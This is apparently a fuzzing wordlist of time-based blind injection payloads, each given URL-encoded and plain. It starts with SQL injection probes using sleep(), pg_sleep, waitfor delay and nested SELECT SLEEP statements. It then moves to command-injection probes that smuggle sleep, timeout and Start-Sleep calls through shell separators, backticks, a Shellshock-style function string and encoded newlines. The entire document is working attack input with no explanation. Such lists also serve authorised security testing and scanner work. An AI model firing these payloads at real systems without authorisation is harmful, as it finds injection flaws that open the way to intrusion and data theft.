sleep(6)%23
sleep(6)#
1%20or%20sleep(6)%23
1 or sleep(6)#
%22%20or%20sleep(6)%23
" or sleep(6)#
'%20or%20sleep(6)%23
' or sleep(6)#
%22%20or%20sleep(6)%3D%22
" or sleep(6)="
'%20or%20sleep(6)%3D'
' or sleep(6)='
1)%20or%20sleep(6)%23
1) or sleep(6)#
%22)%20or%20sleep(6)%3D%22
") or sleep(6)="
')%20or%20sleep(6)%3D'
') or sleep(6)='
1))%20or%20sleep(6)%23
1)) or sleep(6)#
%22))%20or%20sleep(6)%3D%22
")) or sleep(6)="
'))%20or%20sleep(6)%3D'
')) or sleep(6)='
%3Bwaitfor%20delay%20'0%3A0%3A6'--
;waitfor delay '0:0:6'--
)%3Bwaitfor%20delay%20'0%3A0%3A6'--
);waitfor delay '0:0:6'--
'%3Bwaitfor%20delay%20'0%3A0%3A6'--
';waitfor delay '0:0:6'--
%22%3Bwaitfor%20delay%20'0%3A0%3A6'--
";waitfor delay '0:0:6'--
')%3Bwaitfor%20delay%20'0%3A0%3A6'--
');waitfor delay '0:0:6'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A6'--
");waitfor delay '0:0:6'--
))%3Bwaitfor%20delay%20'0%3A0%3A6'--
));waitfor delay '0:0:6'--
'))%3Bwaitfor%20delay%20'0%3A0%3A6'--
'));waitfor delay '0:0:6'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A6'--
"));waitfor delay '0:0:6'--
pg_sleep(6)--
1%20or%20pg_sleep(6)--
1 or pg_sleep(6)--
%22%20or%20pg_sleep(6)--
" or pg_sleep(6)--
'%20or%20pg_sleep(6)--
' or pg_sleep(6)--
1)%20or%20pg_sleep(6)--
1) or pg_sleep(6)--
%22)%20or%20pg_sleep(6)--
") or pg_sleep(6)--
')%20or%20pg_sleep(6)--
') or pg_sleep(6)--
1))%20or%20pg_sleep(6)--
1)) or pg_sleep(6)--
%22))%20or%20pg_sleep(6)--
")) or pg_sleep(6)--
'))%20or%20pg_sleep(6)--
')) or pg_sleep(6)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20'vRxe'%3D'vRxe
AND (SELECT * FROM (SELECT(SLEEP(6)))bAKL) AND 'vRxe'='vRxe
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))YjoC)%20AND%20'%25'%3D'
AND (SELECT * FROM (SELECT(SLEEP(6)))YjoC) AND '%'='
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))nQIP)%23
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)#
SLEEP(6)%23
SLEEP(6)#
SLEEP(6)--
SLEEP(6)%3D%22
SLEEP(6)="
SLEEP(6)%3D'
SLEEP(6)='
SLEEP(6)%2F*'%20or%20SLEEP(6)%20or%20'%22%20or%20SLEEP(6)%20or%20%22*%2F
SLEEP(6)/*' or SLEEP(6) or '" or SLEEP(6) or "*/
sleep(4)%23
sleep(4)#
%3Bsleep%204%3B
;sleep 4;
%7Csleep%204%23
|sleep 4#
%7C%2Fusr%2Fbin%2Fsleep%204%23
|/usr/bin/sleep 4#
%7Csleep%204%3B
|sleep 4;
%26%20sleep%204%3B
& sleep 4;
%3Bsleep%204%7C
;sleep 4|
%60sleep%204%60
`sleep 4`
%60%2Fusr%2Fbin%2Fsleep%204%60
`/usr/bin/sleep 4`
()%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fbash%20-c%20%22sleep%204%22
() { :;}; /bin/bash -c "sleep 4"
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204
|C:\Windows\System32\timeout.exe 4
%7Ctimeout%204%7C
|timeout 4|
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204%7C
|C:\Windows\System32\timeout.exe 4|
%7Ctimeout%204%3B
|timeout 4;
%3Bsystem('timeout%204')
;system('timeout 4')
%3Bsystem('C%3A%5CWindows%5CSystem32%5Ctimeout.exe%204')
;system('C:\Windows\System32\timeout.exe 4')
%26%26%20FOR%20%2FF%20%22delims%3D%22%20%25i%20IN%20('timeout%204')%20DO%20echo%201
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
%3BStart-Sleep%20-s%204%3B
;Start-Sleep -s 4;
%3BStart-Sleep%20-s%204%23
;Start-Sleep -s 4#
%7CStart-Sleep%20-s%204%7C
|Start-Sleep -s 4|
%7CStart-Sleep%20-s%204%3B
|Start-Sleep -s 4;
%3BStart-Sleep%20-s%204%7C
;Start-Sleep -s 4|
%3Bsystem('Start-Sleep%20-s%204')
;system('Start-Sleep -s 4')
%250AStart-Sleep%20-s%204%250A
%0AStart-Sleep -s 4%0A
%250a%20Start-Sleep%20-s%204%20%250a
%0a Start-Sleep -s 4 %0a
